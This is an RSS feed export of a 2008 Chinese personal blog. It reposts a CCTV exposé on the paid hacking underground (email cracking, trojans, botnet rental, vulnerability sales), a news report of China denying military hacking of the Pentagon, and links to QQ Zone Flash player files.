<![CDATA[regsina的博客]]> http://regsina.blog.163.com zh-CN Fri, 4 Jul 2008 04:38:53 +0800 Fri, 4 Jul 2008 04:38:53 +0800 http://blogs.law.harvard.edu/tech/rss 120 <![CDATA[regsina的博客]]> http://ava.blog.163.com/photo/VZFFVJQ9w9e38MNqVt_Xxw==/170010885934498853.jpg http://regsina.blog.163.com <![CDATA[在这里905045242添加日志标题]]> http://regsina.blog.163.com/blog/static/66827483200812872914193 safddsaff]]> http://regsina.blog.163.com/blog/static/66827483200812872914193 0 http://regsina.blog.163.com/blog/static/66827483200812872914193 Thu, 28 Feb 2008 19:29:14 +0800 2008-02-28T19:29:14+08:00 <![CDATA[2008]]> http://regsina.blog.163.com/blog/static/66827483200812765131895 username@domain]]> http://regsina.blog.163.com/blog/static/66827483200812765131895 0 http://regsina.blog.163.com/blog/static/66827483200812765131895 Wed, 27 Feb 2008 18:51:31 +0800 2008-02-27T18:51:31+08:00 <![CDATA[2006年最高兴的一天]]> http://regsina.blog.163.com/blog/static/66827483200812745051101

             zhang      sinazhanghttp      user    465068687

]]> http://regsina.blog.163.com/blog/static/66827483200812745051101 0 http://regsina.blog.163.com/blog/static/66827483200812745051101 Wed, 27 Feb 2008 16:50:51 +0800 2008-02-27T16:50:51+08:00 <![CDATA[央视揭秘网络黑客 背后竟是安全专家]]> http://regsina.blog.163.com/blog/static/668274832008118155230 警方在上海将几名犯罪嫌疑人全部抓获,令人惊诧的是,这些网络黑客,在现实中竟然是网络公司的安全专家。 


  黑客留给我们的印象,似乎是一群天生对网络技术着迷的发烧友,然而,现在它也开始变成了一门生意,互联网上如今可以看到不少黑客广告,只要你交300元钱,他们可以帮你在一天之内破解一个电子邮箱,交5000元钱,可以帮你同时攻击5000台计算机,而如果出价更高的话,黑客甚至能为你攻击一家公司的网站和服务器,这些黑客的幕后究竟隐藏着什么秘密?
  黑客肆意攻击,背后竟是网络公司的安全专家


  我们在电脑搜索引擎里,随意输入了破解邮箱、攻击网站等几个字,随即记者便找到了无数条与电脑黑客有关的信息,在一家名叫兰盟业务的网站,记者看到,虽然网页十分简单,但以美国大片《黑客帝国》为背景的剧照却十分引人注目,在网站提供的业务上,除为客户专业破解个人VIP邮箱、企业邮箱,以及各种网站的登陆密码之外,同时还承接服务器攻击,编写黑客软件、木马病毒定制等业务,这些内容到底是真是假?提供这些业务的又究竟是什么样的人?按照网页上留下的QQ号码,记者找到了一个网名叫做“兰盟业务”的人。 
  画面文字:“你好!能帮我破解一个邮箱吗?可以啊,那个邮箱最近登录过没有?”
  记者:“给他说登陆过,你再问问他要多少钱?”
  不一会儿,兰盟业务就告诉记者,破解邮箱的价格要看是免费邮箱,还是VIP会员邮箱来决定。
  记者:“你就跟他说,比如说免费的要多少钱一个?”
  兰盟业务:“500元。”
  接着,记者又试探性地向兰盟业务打听,能否帮我们攻击一家公司的网络服务器,兰盟业务很快做出回应,攻击网络服务器虽然不像破解邮箱那么容易,但这对他们来说同样是小菜一碟,不过收费会比破解邮箱要高一些。
  记者:“那你问他大概要多少钱?”
  兰盟业务:“如果难度不大,最少要800块钱一个小时。”
  兰盟业务介绍说,如果要求攻击的难度大,攻击破坏程度比较严重的话,那么价格至少要1300元钱一个小时,在一番讨价还价之后,兰盟业务答应先以400元钱的价格,帮记者破解一个免费邮箱。
  兰盟业务:“你把钱先打过来。”
  记者:“问他卡号是多少,让他把卡号告诉我,你先等会儿。”
  几分钟以后,兰盟业务把他的银行卡卡号告诉了记者,并同时让记者提供需要破解的邮箱地址,与兰盟业务一样,同样在网上大张旗鼓地叫卖黑客攻击业务的还有很多,记者在另一家黑客网页的业务栏里同样看到,他们除了提供破解邮箱、攻击网站等业务之外,还出售破解邮箱密码软件、灰鸽子生成器、QQ密码等破解工具软件,而与兰盟业务不同的是,这家网站的联系方式不仅有QQ号,同时还留下了手机号码。
  记者:“那个VIP邮箱你们能破吗?”
  “可以的,可以破。”
  记者:“价格呢?”
  “这个,都收一千块钱吧。”
  在电话中,这位男子不无炫耀的告诉记者,他们对windows、nux系统很有研究,并且擅长各种脚本注入,挖掘脚本漏洞,这位男子还介绍说,攻击网站服务器也是他们拿手的活。
  “挂(病毒)码,那个就贵了。”
  记者:“那个多少钱?”
  “挂(病毒)码,有两千的,有一千五的。”
  俗话说,有钱能使鬼推磨,这话放到这些黑客身上到真是不假,只要肯给钱,无论窃取别人计算机里的机密材料,还是攻击别人的网站服务器,黑客们都会帮你去做,那他们的这种生意又会给那些被攻击的企业和个人带来什么后果呢?
  四川省世纪名流绿色科技有限公司,是一家专业代理国内外知名节电产品的私营企业,就在今年上半年,公司网络系统就遭受到了一场网络黑客的攻击,这至今还让公司负责人心有余悸。
  张经理:“我们正在做一个标书,正准备投一个标,一个地方的标,然后标书已经做出来了,但是在投标的前一天晚上,我们电脑就出现问题了,死机,打不开。”
  据公司张经理介绍,当时他们准备去参加一个标底为800多万的市政节电项目的招标,为竞争这个项目,他们前期做了大量的准备工作,做好的标书也全都保存在公司的电脑里,情急之下,他们找到一位精通电脑的朋友,而最后他们得知,公司联网的几台电脑全被中了病毒,所有硬盘被格式化,电脑里的投标资料和一些重要的客户资料,也全部丢失。
  记者:“如果能正常参加投标的话,你的把握有多大?”
  张经理:“百分之七八十吧,因为我们的产品还是比较有优势的。”
  这次突如其来的网络灾难,不仅让世纪名流绿色科技公司的业务无法正常运转,同时也因为竞标流产,给公司造成了近百万元的经济损失,而事实上,因为遭受网络黑客攻击,导致重大经济损失的,绝非四川这一家公司。就在不久前,北京联众科技公司在推出一款大型游戏产品时,也同样遭到了网络黑客的攻击,新在游戏发布的当天,联众在北京、上海等地的服务器遭到猛烈攻击,大量攻击数据突然从网上涌来,导致网站瘫痪,网页无法打开,众多玩家无法进入游戏。
  赵鹏:“持续的大流量攻击,那样时候已经超出了我们所能够去抵御的范围。”
  公司负责人:“我来到联众大概有三年左右,这次的攻击其实是以前从来没见过的,一个大规模的攻击。”
  在接下来的几天里,对方的攻击依然有增无减,而且对方攻击的针对性非常明确,大规模的攻击全是有备而来,联众公司对此毫无抵御之力。
  公司负责人:“所以这样我们就认为,这完全是一种恶意攻击了。”
  在一切可能抵御手段都宣告失败的时候,联众公司向北京警方报了警,与此同时,联众公司不断尝试使用了几家国内外知名公司的防火墙设备,但都没有明显的效果,就在他们一筹莫展的时候,上海一家网络安全公司主动打电话向联众推销起了他们的防火墙,并承诺他们研发的防火墙,绝对能够阻止外来攻击,而联众在试用其防火墙设备后,果然发现,攻击立刻大幅下降,但当联众停用其防火墙,表示不愿购买防火墙产品时,联众网站马上又遭到更加猛烈的大规模攻击。
  警方:“当联众公司不在使用他的产品,准备撤掉之后,又遭到了同一个攻击源的攻击,这一点我们感到很反常。”
  警方经过几天缜密侦查,很快将攻击黑客锁定在了上海这家网络安全公司经理罗某及销售人员李某身上,不久,警方在上海将几名犯罪嫌疑人全部抓获,而联众公司为此却遭受了数百万元的经济损失,令人惊诧的是,这些网络黑客,在现实中竟然是网络公司的安全专家。
  现实世界中的黑客帝国
  黑客攻击给一些企业带了巨大的经济损失,现在很多企业的业务越来越离不开电脑和网络,那黑客们是怎么突破一道道防火墙,肆意破坏和盗取这些信息?他们这种行为背后,又隐藏着什么样的经济利益?我们记者几经努力,终于找到一名曾经经历过黑客生涯的网络高手,并最终说服他接受了我们的采访。
  在见到黑客张之前,记者一直充满着好奇,当记者见到他的第一个要求,就是让他当场做一个破解邮箱的演示。
  黑客张:“这是一款风暴截取工具,就是说,我们可以轻易的用编程的方式来实现一个这样的软件,点一个邮箱的时候,他在身份验证的同时,可以立刻知道用户名和密码。”
  记者把自己的邮箱地址告诉了黑客张,让他在最短时间内破解掉邮箱密码。
  黑客张:“我们给这个用户发一封邮件,包含我们的木马程序,然后我们把木马程序运行了之后,会监视你所有的邮箱的操作,当发现你登陆邮箱的时候,他就会记录你的用户名和密码。”
  接着,记者按照黑客张的要求,在旁边另一台电脑上登陆了一次自己的邮箱,让人惊讶的是,就在我们退出邮箱后短短的几分钟,黑客张就破解了邮箱的密码。
  黑客张:“这个就是USFR,testuser0001,testuser,这个就是密码,这个就是用户名,那还有比如说我们要攻击一个网站,全部都可以做。”
  记者:“那个简单吗?”
  黑客张:“也是非常容易,利用现有的工具就可以完成,难度都不大。”
  据黑客张透露,他今年虽然不到35岁,但在黑客圈里已经堪称“大师”级的人物了,在惊叹黑客张的网络技术之余,记者同样感到好奇,他们到底是怎样开展业务的?又是通过什么手段去谋取暴利的?黑客张介绍说,诸如他这样级别的,被圈内称作为“造枪人”,他可以为买家们制造出各种用来偷盗账户密码,攻击网站,以及发送垃圾邮件和插件广告的木马病毒。
  记者:“怎么来谈这个生意的?”
  黑客张:“一般来说通过论坛,或者通过技术聊天工具,比如说QQ来进行谈生意等等。”
  黑客张告诉记者,他们所有的业务都是在网上交易完成,对每一笔交易也都是小心谨慎。
  “就是说黑客一般来说都不会出面,都是通过网上的方式,要么是银行卡转账,网银转账,或者通过支付宝、淘宝之类的这种交易平台转账。”
  而在黑客张看来,那些破解一个邮箱密码,盗取一些QQ号的事,他都不屑一顾,但在网上,到处寻找这样业务的黑客们却是大有人在。
  黑客张:“因为有蛮多那种黑客论坛等等,或说黑客网站,他们上面都明码标价,就是说攻击网站或者是怎么样,让它瘫痪多久,然后他的费用从几千块到上万块都有可能。”
  黑客张透露说,在圈内,黑客们可以牟取暴利的业务有很多,时下网上交易比较看好的是“肉鸡”业务,而所谓肉鸡,就是黑客们借壳一些免费电影网站,植入恶意软件,一旦有网民浏览该网页,木马病毒就秘密潜入,将对方电脑控制,黑客们就可以如同使用自己的计算机一样,去浏览对方的电脑,窃取“肉鸡”上的QQ号、游戏装备等。
  “那些黑客就教过来学习的用户如何攻击别人计算机,如何获取肉机,然后这些学员会把自己攻击得到的肉机,再卖给黑客。”
  黑客们以低廉的价格,从网上其他散户那里收回大量的肉鸡,接着再将肉鸡组成一个个具有强大攻击力的“僵尸网络”,据资料显示,目前中国互联网上至少有5个僵尸网络操控的“肉鸡”规模已超过10万台,个别僵尸网络已经达到30万台以上,而拥有这些僵尸网络的黑客,则在网上明码标价租售,如果租用由5000台肉鸡组成的僵尸网络,租金就是5000元钱一次,而仅从出租买卖这些僵尸网络,黑客们每年就至少有上百万元的经济收益。
  “目前的形势都是出租,就是说按照时间段和时间,还有数量这个来收费的。”
  据黑客张透露,虽然“僵尸网络”在圈内十分走俏,但这些仅仅是黑客们牟利的一部分,真正能赚大钱的还是靠出卖一些网站的漏洞。
  “特别就是说,操作系统的漏洞,服务器、Web服务器的漏洞等等,就是说他们这个都是明码标价的,而且价格都不菲。”
  记者:“一个漏洞大概能卖多少钱?”
  “几十万到几百万。”
  然而,这样天价般的漏洞却不是一般黑客能找到的,而这样的漏洞,也因其强大的打击面和攻击性,让许多想打击竞争对手的商业用户趋之若鹜。
  黑客张:“比如说我通过客户端这边访问网站的同时,利用一段精心处理的代码,可以在服务器上执行一段程序的,这种漏洞都是可以卖到天价的。”
  黑客张介绍说,现在一些拥有高超技艺的黑客,已经把寻找大型网站的漏洞,当成了他们重要的生财之道。
  “微软的漏洞的修补,他就算打过补丁之后,还会有新的漏洞出来,然后还有的公司就是说,专业去挖掘这些漏洞。”
  对于网络黑客们的灰色收入,黑客张直言不讳地说,这是现在投入成本和违法成本最低,收入却最丰厚的黑色职业之一,黑客们一般都有一份正当的职业,作为一个稍有技术实力的网络黑客,他们的年收入大多在百万元以上。
  “然后就是说如果有规模的、有组织的那种,他肯定是收入不菲,而且他不是只在国内做,他可能是国际性的。”
  记者:“那种一年,就单个的,一年收入多少钱?”
  “上百万,几千万,应该是没有问题。”
  暴利背后的互联网黑色产业正在摧毁大众对网络经济的信任
  黑客张刚才的讲述,让我们发现了一个现实世界中的黑客帝国,在这里,同样有巨大的利益诱惑,同样有疯狂敛财的黑幕,随着这条地下产业链逐步形成,黑客们的组织手段和攻击目标也不断升级,从盗取QQ号、Q币这种虚拟财产,开始转向直接攻击商业用户,不法黑客的危害正在日益显现,那我们能够容忍这样巧取豪夺的游戏规则吗?
  据最新发布的《2007年上半年中国电脑病毒疫情及互联网安全报告》指出,截至2007年上半年,全国被感染的计算机已超过759万台,与去年同期相比增长了12.2%,其中被感染的计算机中,遭受过木马病毒攻击的更是高达91.35%。业内人士指出,现在黑客们制造木马、传播木马病毒,以及如何通过第三方平台销赃、洗钱等等,都有了明确分工。
  傅盛:“他完全是一种叫做有社会分工的,有这个流水体系的,有上下级关系的这么一个系统吧。”
  傅盛,北京一家互联网安全卫士小组的负责人,他告诉记者,在一些黑客团伙中,他们有人专门负责传播病毒,有人负责销售偷盗来的游戏装备等,还有人专门负责洗钱,同时,他们还与一些木马病毒和流氓软件等合作,互为攻守,以盗取QQ里游戏装备为例,黑客在盗取游戏装备之前,首先要去偷一个QQ号,而窃取QQ号的第一步,就是先买一个木马病毒,接着再把木马种植到被偷的机器当中。
  “那么,我要有一款木马,这个木马在网上有非常非常多的人在销售,而且他会教你如何加隐藏壳,加壳的话,就是你那个受害人,用户受害人即使装了杀毒软件,他也查不出来。”
  买到木马病毒这仅仅是第一步,接下来他们就开始大规模地把木马植入到无数的计算机里,而那些中木马病毒的电脑就全在黑客的控制之中,这样他们就可以肆意盗取别人电脑里的QQ号和其它重要资料。
  “偷到手上以后,一般这些人他不会直接去做最底层的销售,他把这个QQ号然后进行打包销售,他要卖给下家,这个下家在网络上叫做信封,比如这个信封里面就放着1000个QQ号。”
  据傅盛介绍,这些下家买到打包销售的QQ号后,他们接下来就开始拆包处理,把里面的QQ号进行分类整理后,再进行销售。
  “有这种短QQ号,很挣钱的,那么我直接拿这种QQ号,叫靓号嘛,靓号就直接可以卖了,这种QQ号本身就可以拿出来卖钱。”
  接着,这些下家就把剩下那些不值钱的QQ号,再捆绑打包后卖给其他下家,而另外下家,就利用这些QQ号上的好友资料,给他们群发虚假信息,骗取钱财。
  “这消息有可能是说,我有急事了,你给我汇五十块钱吧,可能有的人都收到过,或者说是有个什么,我给你点了一首歌,你打这个电话拨一下,你就能听到,也就是说,最后一层是利用QQ的好友资源,实现一个木马的扩散,或一个盈利的扩散。”
  而业内许多人士认为,那些盗取QQ号、窃取网银和游戏装备等,仅仅是黑客经济产业链中最底层的一环,现在黑客最容易获取暴利的还是制作木马和挖掘大型网站的漏洞,他们为获取更大利益,往往相互捆绑在一起,按照收入的比例分红和提成,此外,黑客之间合作牟利的方式还有很多。
  知情者:“我就做一个能够生成木马的工具,然后靠出售这个工具来获利,有些人专门还开在网上开培训班,来教人怎么写木马程序,或怎么用木马这种工具,那这也可以获利,有些人他是控制这些,通过木马程序控制这些机器,这些机器俗称肉机,他可以把控制这些机器,叫出售肉机来获利。”
  据业内资深专家估计,全国有80%-90%联网电脑,都是或者曾经是被网络黑客控制的机器,而其中大部分计算机主人对此都毫不知情,对于目前互联网黑色产业愈演愈烈的局势,国家计算机应急处理中心杜跃敬博士表示出极大的担忧,他认为互联网的黑色产业正在摧毁大众对网络经济的信任。
  杜跃敬:“一个他们黑客现在掌握的资源非常多,因此他们的破坏力是非常强大的,这是一方面的特点,也就是说对方太强大;第二方面的特点,太猖狂,就说攻击者是明目张胆,肆无忌惮。”
  杜跃敬博士告诉记者,目前全国网络安全形势十分严峻,大规模的网络攻击也越来越多,而对于网络犯罪的打击,却一直困难重重,按照目前我国《刑法》第285、286和287这3条法规来打击网络犯罪,实际上非常困难,首先,在互联网上取证难度很大,因为多数攻击是在机主不知情的情况下发动的,所以很难抓住元凶;其次,《刑法》规定的“重大经济损失”在互联网上很难认定;再有就是对打击网络犯罪的执法审批程序十分繁琐。
  “就是虽然法律上已经有很多,但是还会有一些事件导致在法律具体运用的层面上,运用的时候呢,不是那么容易就能够适用一些特定的案例的,还是有一些法律上的空白。”
  半小时观察
  本来以为,《黑客帝国》只是一个存在于人们想象中的科幻故事。然而,当看到互联网上的这条黑客产业链渐渐成型的时候,我们突然发现,黑客帝国并不遥远,它正在威胁着我们的现实生活,它的危害一点不亚于电影中虚构的角色。
  在虚拟的世界里,这些黑客就像穿着夜行衣、拿着利刃的盗贼。他们要么翻墙入室,溜门撬锁,要么明火执杖,打家劫舍,如同出入无人之境。现实世界的道德、法律,在他们面前反倒变得虚幻起来,只有巨额的不义之财才是唯一真实的存在。如果说,早期的黑客多少带着对网络技术的好奇,那如今这种职业黑客集团的出现,已经变成了一种纯粹的网络犯罪。
  黑客在发起每一次攻击前,他们总是在寻找网络系统的漏洞,只有找到技术漏洞,他们才有下手的机会。但现在看来,最大的漏洞其实并不在网络和电脑技术上,而是在于我们的法律体系,还没有跟上黑客转型的脚步,面对种种花样翻新的作案手段还拿不出对应的惩罚措施。如何真正打败这些黑客,我们最需要的不是电影中身怀绝技的打斗高手,也不是天天升级的防火墙和杀毒软件,而是一套健全的法律体系。
黑客攻击事件
·黑客攻击全球最大招聘网站
  全球最大的招聘网站Monster.com近日遭到了一种新型特洛伊木马病毒的攻击。黑客成功窃取了数十万用户包括家庭住址和电话号码在内的个人信息,并向受害者发出勒索邮件。 
·俄黑客团伙依福布斯榜网盗150万美元
  据俄新网报道,俄罗斯黑客团伙成功盗窃美国几名富豪银行帐户资料,获得赃款共计150万美元。8月17日,美国纽约地方检查机关宣布对这一黑客团队进行起诉。 
·黑客少年假冒巨富骗钱近亿
  他专挑《福布斯》富豪榜上的美国巨富下手,先从网上盗取其个人资料,再冒充他们四处行骗,企图盗窃上亿元,直至日前才落网。 
·3黑客非法侵占22亿游戏金币
  利用木马病毒等途径非法侵入游戏中心系统,在游戏过程中通过故意输分和直接转移的方式,将22亿个游戏金币转为己有,并低价出售获利14万元。3名作案的网络黑客因犯破坏计算机信息系统罪而锒铛入狱。 
·黑客侵入荷兰银行部分客户账号
  荷兰银行的发言人说,前段时间有部分客户账号中的资金被网络犯罪分子利用电脑病毒盗走。 
黑客手段
·揭密黑客如何通过虚拟世界生财
  这些来势凶猛的黑客大军虽然在虚拟世界中到处横行,但对于电脑高手来说,他们最多只是网络中的破坏者,与真正的黑客相比,还相差甚远。 
·看看黑客如何破解验证码机制
  所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息。 
·旁观第六代网络黑客
  对第六代黑客而言,只有把技术做得更扎实才能得到“黑客”圈中的认可。 
·解密七大类黑客全攻略
  本月,国际黑客的猖獗再次震惊全球。在不到半个月的时间里,黑客两度攻入联合国官方网站,甚至篡改联合国秘书长潘基文发表声明的网页。 
防范黑客
·德国实行“反黑客”法
  早前,德国通过了“反黑客”法律,现在这部法律已经生效了。为了避免被起诉,有些安全网站已经重新安置或者关闭了。 
·切断一切黑客入侵的路径
  在网络给我们的工作学习带来极大方便的同时,病毒、木马、后门以及黑客程序也严重影响着信息的安全。这些程序感染计算机的一个共同特点是在注册表中写入信息,来达到如自动运行、破坏和传播等目的。 
·防范黑客攻击 企业的“新安全”运动
  最值得注目的趋势有两点:一是基础网络应用成为黑客/病毒的攻击重点;二是黑客已经形成规模化产业链。 
解读黑客
·史上五大最危险计算机黑客出炉
  国外媒体近日评出了有史以来最危险的五大计算机黑客,他们年纪不大就成为罪犯并被捕。其中一些人从事黑客行为是为了赚钱,而另外一些则仅仅是出于兴趣。 
·黑客游戏潜规则
  也许是混在“江湖”的日子久了,勇敢的讲出潜规则也就不再那么羞涩了。潜规则下的黑幕交易还在继续,受损的用户不断增加。 
·6000黑客齐聚 社交网站成新目标
  上周末,黑客和电脑安全专家齐聚赌城拉斯维加斯,专门就社交网站漏洞进行了讨论。 
·徘徊在天使与魔鬼之间的黑客
  边制毒边杀毒,黑客技术成某些人甚至公司兜售杀毒软件或勒索钱财工具。]]> http://regsina.blog.163.com/blog/static/668274832008118155230 0 http://regsina.blog.163.com/blog/static/668274832008118155230 Mon, 18 Feb 2008 13:55:23 +0800 2008-02-18T13:55:23+08:00 <![CDATA[中国否认军方黑客入侵五角大楼]]> http://regsina.blog.163.com/blog/static/668274832008118153570 继德国媒体上月披露所谓“中国军方黑客侵入德国政府网站”后,英国《金融时报》9月3日引述不具名美国官员的话,再次指责“中国军方黑客入侵美国五角大楼计算机网络”。  外交部发言人姜瑜4日在北京作出回应称,最近有关中国军方对美国国防部实施网络攻击的指责是毫无根据的。“……有人对中国进行无端指责,妄称中国军方对美国国防部实施网络攻击,这是毫无根据的,也是冷战思维的体现。”姜瑜在当天的例行记者会上说。
 

  中国海军少将、国防大学战略研究部副主任、战略研究所所长杨毅4日在接受早报记者采访时也表示,中国作为一个负责任大国,“根本没有、也不会采用‘黑客’攻击的方式作为军事战略手段。”
  拿防长电脑说事
  美国五角大楼今年6月曾证实遭遇了一次网络攻击,当时关闭了部分为美国国防部长罗伯特·盖茨办公室服务的计算机系统,但拒绝透露他们认为谁是此次攻击的幕后人物。
  而英国《金融时报》3日引述了数位不具名的美国政府现任和前任官员的说法称,一项内部调查已显示,此次黑客攻击“来自中国人民解放军”。
  报道称,一位美国高层官员表示,五角大楼已查明此次攻击的确切来源。另一位知情人士表示,“高度确信……几乎可以完全肯定的是”,中国军方应对此负责。
  “人民解放军已显示出实施造成我们系统瘫痪的攻击能力……以及在发生冲突的情况下,大规模再次入侵并破坏(系统)的能力。”一位美国前政府官员说,他还称,中国军方黑客已渗入过美国防务公司和智囊机构的网络。
  他们表示,6月份的网络攻击将“中美军事网络战”提到了一个新的高度,美国为此充满畏惧和担忧,因为“此次渗透已表明中国有能力在关键时刻干扰和中断美方系统”。
  报道还引述所谓“知情人士”的话说,来自中国许多地方的黑客在攻克五角大楼防火墙之前,花费了数月时间探查其系统。一位相关人士表示,被窃取的资料多是不具保密性质的。在遭遇黑客攻击后,五角大楼关闭其网络系统一个多星期,并进行全面诊断,目前五角大楼仍在调查到底多少数据被下载。同时,他表示这次事件已经促使美方重新考虑邮件的安全措施。
  中国外交部发言人姜瑜对此作出严正回应说,“中国政府一贯坚决反对和依法严厉打击包括黑客行为在内的任何破坏网络的犯罪行为。在中美致力于发展建设性合作关系,中美两军关系呈现出良好发展势头的大背景下,有人对中国进行无端指责,妄称中国军方对美国国防部实施网络攻击,这是毫无根据的,也是冷战思维的体现。”
  中国也常遭袭击
  “我们认为黑客是一个国际性的问题,中方也经常遭到黑客的袭击。中方愿与其他国家一道,采取措施共同打击网络犯罪。在这方面,我们愿意加强国际合作。”姜瑜说。
  事实上,这只是美国指责“中国军方的网络战”的最新一宗。今年3月,有美国媒体就引用某美国空军将军的话说,中国黑客“很可能是去年(2006年)11月入侵美国海军战争学院的黑手,”甚至鼓吹这种行为应被视为“网络9·11”。
  近一期的《简氏防务周刊》则在题为“来自中国的电脑攻击留给人许多问题”的文章里传达着这样的思想:“中国国防工业和军事战略是难解之谜,中国的网络战争能力更是谜中之谜”。文章列举了近年来针对美国军政系统计算机网络的攻击,最早一宗被认为来自中国黑客的攻击发生在2004年。
  但需要看到的是,所有这些关于中国发动网络攻击的指控报道及其引述的说法,都处于“有可能是中国人干的”的水平。换句话说,并没有真凭实据。德国总理默克尔上月底访问北京前,德国《明镜》周刊发表并被广泛转载的封面文章,称德国政府数个关键部门频遭中国黑客的攻击、“显然受到国家的支持,很有可能来自中国军方”,也是未经证实的消息。
  “中国没有军方黑客”
  中国海军少将、国防大学战略研究部副主任、战略研究所所长杨毅表示,传播、鼓吹所有这些未经证实的消息,都是极为不负责任的行为。“这完全是变相的中国军事威胁论的论调。”杨毅说,“按照西方的司法体系,在未经证实的情况下,被告都是无罪推定的,而一涉及到与中国有关的、可以抹黑中国的问题,这个原则就不存在了,他们会随随便便给中国扣上帽子。”
  他指出,在进入信息社会后,信息方面的较量必然成为各国关注的问题,中国也很重视信息安全,“但中国奉行的是防御型的军事战略。作为一个负责任的堂堂正正的大国,中国用黑客这种非法和不入流的手段对他国进行恶意攻击?这完全是臆想和无中生有。”杨毅说,“我可以说,中国根本就没有所谓的‘军方黑客’。”
  “中国政府坚持和谐发展,发展和谐社会、和谐世界。”杨毅说,“事实胜于雄辩。中国政府的言和行,经得起世界的考验。”
中国黑客
·德互联网专家:中国军方黑客之说站不住脚
  据德国之声电台网站8月30日报道,德国互联网专家认为,说黑客来自中国军方没有足够说服力。 
·外交部发言人:中国愿与德国共同打击黑客
  外交部发言人姜瑜26日就所谓德国政府部门计算机系统遭到中国“黑客”攻击一事答记者问。 
·黑客门事件引发人们高度关注
  面对此种现象,需要的是冷静思考,平静地面对和坦诚的对话,克服热血上脑的冲动,避免将本可以在司法领域里处理的计算机跨国犯罪问题上升到政治领域,避免用冷战思维为指导来报道所谓“有政府背景”的黑客攻击,通过有效的跨国司法合作来治理这一新的犯罪现象,才是解决问题的方法。 
·中方反对“黑客”行为
  昨晚,外交部发言人姜瑜就所谓德国政府部门计算机系统遭到中国“黑客”攻击一事表示, 中国政府一贯反对和严禁包括“黑客”行为在内的任何破坏计算机网络的犯罪活动。 
黑客行为
·四成以上黑客在研究“免杀病毒”
  一项关于“2007年黑客行为分析”的调查显示,2007年黑客行为呈明显上升趋势,41.86%左右的黑客或准黑客正在研究“免杀病毒”技术。 
·黑客纷纷破解iPhone 至少曝光4种方法
  至少有4个黑客组织声称他们已经破解了AT&T为iPhone蜂窝服务加的锁。他们说,苹果的iPhone是能够破解的,让用户使用AT&T以外的蜂窝服务提供商的网络上使用这种手机。 
·央视揭秘网络黑客 背后竟是安全专家
  警方在上海将几名犯罪嫌疑人全部抓获,令人惊诧的是,这些网络黑客,在现实中竟然是网络公司的安全专家。 
·盗用证券账户 “股票黑客”被捕
  温州一青年非法对200多个证券交易账户实施操纵,从中非法获利。8月21日,温州市鹿城区检察院以涉嫌盗窃罪批捕犯罪嫌疑人廖某。 
黑客攻击事件
·黑客攻击全球最大招聘网站
  全球最大的招聘网站Monster.com近日遭到了一种新型特洛伊木马病毒的攻击。黑客成功窃取了数十万用户包括家庭住址和电话号码在内的个人信息,并向受害者发出勒索邮件。 
·俄黑客团伙依福布斯榜网盗150万美元
  据俄新网报道,俄罗斯黑客团伙成功盗窃美国几名富豪银行帐户资料,获得赃款共计150万美元。8月17日,美国纽约地方检查机关宣布对这一黑客团队进行起诉。 
·黑客少年假冒巨富骗钱近亿
  他专挑《福布斯》富豪榜上的美国巨富下手,先从网上盗取其个人资料,再冒充他们四处行骗,企图盗窃上亿元,直至日前才落网。 
·3黑客非法侵占22亿游戏金币
  利用木马病毒等途径非法侵入游戏中心系统,在游戏过程中通过故意输分和直接转移的方式,将22亿个游戏金币转为己有,并低价出售获利14万元。3名作案的网络黑客因犯破坏计算机信息系统罪而锒铛入狱。 
·黑客侵入荷兰银行部分客户账号
  荷兰银行的发言人说,前段时间有部分客户账号中的资金被网络犯罪分子利用电脑病毒盗走。 
黑客手段
·揭密黑客如何通过虚拟世界生财
  这些来势凶猛的黑客大军虽然在虚拟世界中到处横行,但对于电脑高手来说,他们最多只是网络中的破坏者,与真正的黑客相比,还相差甚远。 
·看看黑客如何破解验证码机制
  所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息。 
·旁观第六代网络黑客
  对第六代黑客而言,只有把技术做得更扎实才能得到“黑客”圈中的认可。 
·解密七大类黑客全攻略
  本月,国际黑客的猖獗再次震惊全球。在不到半个月的时间里,黑客两度攻入联合国官方网站,甚至篡改联合国秘书长潘基文发表声明的网页。 
防范黑客
·德国实行“反黑客”法
  早前,德国通过了“反黑客”法律,现在这部法律已经生效了。为了避免被起诉,有些安全网站已经重新安置或者关闭了。 
·切断一切黑客入侵的路径
  在网络给我们的工作学习带来极大方便的同时,病毒、木马、后门以及黑客程序也严重影响着信息的安全。这些程序感染计算机的一个共同特点是在注册表中写入信息,来达到如自动运行、破坏和传播等目的。 
·防范黑客攻击 企业的“新安全”运动
  最值得注目的趋势有两点:一是基础网络应用成为黑客/病毒的攻击重点;二是黑客已经形成规模化产业链。 
解读黑客
·史上五大最危险计算机黑客出炉
  国外媒体近日评出了有史以来最危险的五大计算机黑客,他们年纪不大就成为罪犯并被捕。其中一些人从事黑客行为是为了赚钱,而另外一些则仅仅是出于兴趣。 
·黑客游戏潜规则
  也许是混在“江湖”的日子久了,勇敢的讲出潜规则也就不再那么羞涩了。潜规则下的黑幕交易还在继续,受损的用户不断增加。 
·6000黑客齐聚 社交网站成新目标
  上周末,黑客和电脑安全专家齐聚赌城拉斯维加斯,专门就社交网站漏洞进行了讨论。 
·徘徊在天使与魔鬼之间的黑客
  边制毒边杀毒,黑客技术成某些人甚至公司兜售杀毒软件或勒索钱财工具。]]> http://regsina.blog.163.com/blog/static/668274832008118153570 0 http://regsina.blog.163.com/blog/static/668274832008118153570 Mon, 18 Feb 2008 13:53:57 +0800 2008-02-19T12:04:47+08:00 <![CDATA[QQ空间flash播放器 不拿白不拿]]> http://regsina.blog.163.com/blog/static/668274832008116430450
http://ndo510.go3.icpcn.com/cmp/cmp.swfhttp://www.cxqq.net/ 
http://www.cxqq.net/mp5/qq293061.swf
 
http://www.xk77.com/fd/003.swf
 http://qzone.qq7b.com/flash/bofangqi/3/9.swf
 http://qzone.qq7b.com/flash/bofangqi/3/9.swf]]> http://regsina.blog.163.com/blog/static/668274832008116430450 0 http://regsina.blog.163.com/blog/static/668274832008116430450 Sat, 16 Feb 2008 16:30:45 +0800 2008-02-16T16:30:45+08:00 <![CDATA[万能QQ空间FLV播放器、诱舞坊2008首创-引领空间潮流!]]> http://regsina.blog.163.com/blog/static/66827483200811647170 本文同时由  ┌●n!y.僾祢 发表在 Club-全国非主流达人总联盟 中 查看原文

2008年最新的,功能也比较完善。  特色功能:
1、任意.flv文件播放,带播放时间显示,暂停、重新播放,停止等功能。
2、缓冲时间快,不卡,带LOAD进度条。
3、外表简洁、易用。
